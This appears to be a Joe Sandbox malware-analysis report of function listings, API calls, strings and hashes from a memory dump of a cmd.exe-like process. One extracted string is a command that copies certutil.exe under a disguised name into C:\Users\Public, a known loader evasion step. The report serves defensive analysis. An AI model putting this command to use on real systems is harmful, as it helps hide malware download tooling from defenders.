Instruction ID: b41973339f8d04985eafc05cce405603f7294f63c4e98e37e347a15c2914ec16
Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
Instruction Fuzzy Hash: D8518D20B0AA87C5FE18AB16955617A26A1FF49B94F4C463DD91EB77D1DF3CE802C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT ref: 00007FF683F7F0D6
iswspace.MSVCRT ref: 00007FF683F7F1BA
wcschr.MSVCRT ref: 00007FF683F7F1E7
iswdigit.MSVCRT ref: 00007FF683F7F1FF
iswdigit.MSVCRT ref: 00007FF683F7F2BB

Strings

=,;, xrefs: 00007FF683F7F1CE
), xrefs: 00007FF683F7F18C

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswdigit$iswspacewcschr
String ID: )$=,;
API String ID: 1959970872-2167043656
Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
Instruction ID: 0ee32e89c87e697308430c52e013c4cb8ca425f5d05bbe50ed11dcf49361b18d
Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
Instruction Fuzzy Hash: 63418E61E0879AC6FBA48B15E94637966F0BF10795F8C503EC98DE32A0DF3CA481C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

iswalpha.MSVCRT ref: 00007FF683F9BABA
towupper.MSVCRT ref: 00007FF683F9BAD1
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9BB13
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9BB2F
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9BB48

Strings

:, xrefs: 00007FF683F9BAAF
%04X-%04X, xrefs: 00007FF683F9BBBB

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ErrorLast$InformationVolumeiswalphatowupper
String ID: %04X-%04X$:
API String ID: 930873262-1938371929
Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
Instruction ID: 9542d4a28adfa0a38fe78ae603b3c9ef8ba54f9cff9e2be9da51a73f766f701e
Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
Instruction Fuzzy Hash: DF418431A0CA82D2EB249F51E4522BAB3A0FF84755F48413ADA4EA37D5DF3CD945C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F836EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F83715
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF683F83770
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F83791
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8E96E
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF683F8E9A7
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8E9D5

Strings

.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF683F83703

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
API String ID: 3249344982-2616576482
Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
Instruction ID: c7f2c7ada6260e0a15d3f1e58c86d09f34c58ce8d57fb089cd9603f077390647
Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
Instruction Fuzzy Hash: F2417172618B41C6E7108F12E84576ABAA4FF4DBC8F484239DA4DA77A4CF7CD015CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F86A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT ref: 00007FF683F86A73
wcschr.MSVCRT ref: 00007FF683F86A91
wcschr.MSVCRT ref: 00007FF683F86AB0
wcschr.MSVCRT ref: 00007FF683F86AE3
wcschr.MSVCRT ref: 00007FF683F86B01

Strings

+-~!, xrefs: 00007FF683F86AA9, 00007FF683F86ADC
<>+-*/%()|^&=,, xrefs: 00007FF683F86A8A, 00007FF683F86AF7

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$iswdigit
String ID: +-~!$<>+-*/%()|^&=,
API String ID: 2770779731-632268628
Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
Instruction ID: a79f32a60ebbd46be431ab7bb5c6a4a2757da0ca916808e89f9557405e5861ff
Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
Instruction Fuzzy Hash: 73311B22A49A56C5EB549F06E8512B977E0FF49F89B4D813ADB6EA3354EF3CE404C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F9D899
FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9D8A8
_get_osfhandle.MSVCRT ref: 00007FF683F9D8D7
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9D8F1
_get_osfhandle.MSVCRT ref: 00007FF683F9D8FF
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9D921
_get_osfhandle.MSVCRT ref: 00007FF683F9D969
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9D983

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: File_get_osfhandle$Pointer$BuffersFlushRead
String ID:
API String ID: 3192234081-0
Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
Instruction ID: c686d7a9c435a471396e36b1aa253424203a9fc344a0cfd06782bd37ca67d5be
Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
Instruction Fuzzy Hash: 70318331708681CBE710AF21A40667DBBA1FF89B94F489138EE4AA7795CE7CE405CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F81630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F81673
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F8168D
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F81757
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F8176E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F81788
HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF683F814D6,?,?,?,00007FF683F7AA22,?,?,?,00007FF683F7847E), ref: 00007FF683F8179C

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$Process$Alloc$Size
String ID:
API String ID: 3586862581-0
Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
Instruction ID: 9249832f3f2ee2528ded559e08de2902157d61ddeeed5376b38418c1f3f844ff
Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
Instruction Fuzzy Hash: 00919061A59746C2EB188F1AE44227877A0FF44B94F5D8639EE4DA77A0DF3CE441C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F886F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F888C0: NtOpenThreadToken.NTDLL ref: 00007FF683F888E7
Part of subcall function 00007FF683F888C0: NtOpenProcessToken.NTDLL ref: 00007FF683F88907
Part of subcall function 00007FF683F888C0: NtClose.NTDLL ref: 00007FF683F8896C

SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF683F887D7
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF683F88807
RtlNtStatusToDosError.NTDLL ref: 00007FF683F9517E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9518C
GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF683F951FD
wcsstr.MSVCRT ref: 00007FF683F95219
wcsstr.MSVCRT ref: 00007FF683F95236

Part of subcall function 00007FF683F8885C: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F888A2

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
String ID:
API String ID: 1313749407-0
Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
Instruction ID: 620563cc520cd1cdaff88c8898c7b217cd345acdde6d09bd6eaac71befbd96fa
Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
Instruction Fuzzy Hash: E951D722A09692C2FE589F16E816179A6A1FF49B90F4C463DDD1EB77D1DF3CE441C280

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9EC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F9EC73

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9EE0A

Part of subcall function 00007FF683F8081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F8084E

SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F9ECD5
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9ECED
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F9ED9C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9EDAC
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9EDC8

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
String ID:
API String ID: 920682188-0
Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
Instruction ID: cd0922129b79b95b7b1c5f4481fad49459a564336c546c7e987fdcf565ebd202
Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
Instruction Fuzzy Hash: F5510332605B81CAEB25DF25D8556E877A1FF88B88F08803ACA4E97764EF3CD655C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7DF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF683F7CEAA), ref: 00007FF683F7DFB8
RtlFreeHeap.NTDLL ref: 00007FF683F7DFCC
_setjmp.MSVCRT ref: 00007FF683F7E03E

Strings

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF683F7E00B

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$FreeProcess_setjmp
String ID: extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
API String ID: 777023205-1039199990
Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
Instruction ID: e425d069cf10da7a965a386286b65310012d9fd701dbc89768a9e4844229fcc3
Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
Instruction Fuzzy Hash: BF51387190DA82C6FB518F15A892178B7A0FF98794F5C443ED94EEB3A1DF7CA441CA80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

iswspace.MSVCRT ref: 00007FF683F7F1BA
wcschr.MSVCRT ref: 00007FF683F7F1E7
iswdigit.MSVCRT ref: 00007FF683F7F1FF
iswdigit.MSVCRT ref: 00007FF683F7F2BB

Strings

=,;, xrefs: 00007FF683F7F1CE
), xrefs: 00007FF683F7F18C

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswdigit$iswspacewcschr
String ID: )$=,;
API String ID: 1959970872-2167043656
Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
Instruction ID: 6f1d271d24deb3f330d3ef1f620a34fbbcc3d49cabb99b2fb6501f814fc3a19e
Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
Instruction Fuzzy Hash: 9F4138A5E0879BC6FBA48B15D95A27926F0BF10795F9C503EC98DE32A4CF3CA441C6C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F991B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF683F991FF
wcsrchr.MSVCRT ref: 00007FF683F99232
_wcsnicmp.MSVCRT ref: 00007FF683F99285

Strings

%s, xrefs: 00007FF683F99298
Null environment, xrefs: 00007FF683F991F1
CMD Internal Error %s, xrefs: 00007FF683F991F8

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsnicmpfprintfwcsrchr
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 3625580822-2781220306
Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
Instruction ID: 76ba284800a23b501e32aae25491e66492df5b3a1c4e9aecfd765d0ac4732cc6
Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
Instruction Fuzzy Hash: 3E31F221A08686D2FA549F42A5021BA72A0BF45B94F4D4139DD1DBB7E1EF3CE485C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F81FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F8200F
wcsspn.MSVCRT ref: 00007FF683F82226

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memsetwcsspn
String ID:
API String ID: 3809306610-0
Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
Instruction ID: b8a56048aae820a368dae203ab00dc0b8093563afbd0e935f6f5ef81838422c6
Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
Instruction Fuzzy Hash: 20B1D671A48B46D2EB54CF16E45227977A0FF44B84F888039DA4EA77A0DF7CE841C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F98C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT ref: 00007FF683F98C85
iswdigit.MSVCRT ref: 00007FF683F98CA2
wcstol.MSVCRT ref: 00007FF683F98CBF
wcschr.MSVCRT ref: 00007FF683F98CF0
wcschr.MSVCRT ref: 00007FF683F98D16
wcschr.MSVCRT ref: 00007FF683F98D6A

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$iswdigit$wcstol
String ID:
API String ID: 3841054028-0
Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
Instruction ID: aa67f6eb5983af81ce0697724017f99e3046055599242afd7d0f44716e493694
Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
Instruction Fuzzy Hash: ED51E527A08652D2EB649F15D8021B976A1FF68B54B4C823BDE5DE32D4EF3CE452C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F75984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F93687
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF683F7260D), ref: 00007FF683F936A6
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF683F7260D), ref: 00007FF683F936EB
_get_osfhandle.MSVCRT ref: 00007FF683F93703
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF683F7260D), ref: 00007FF683F93722

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

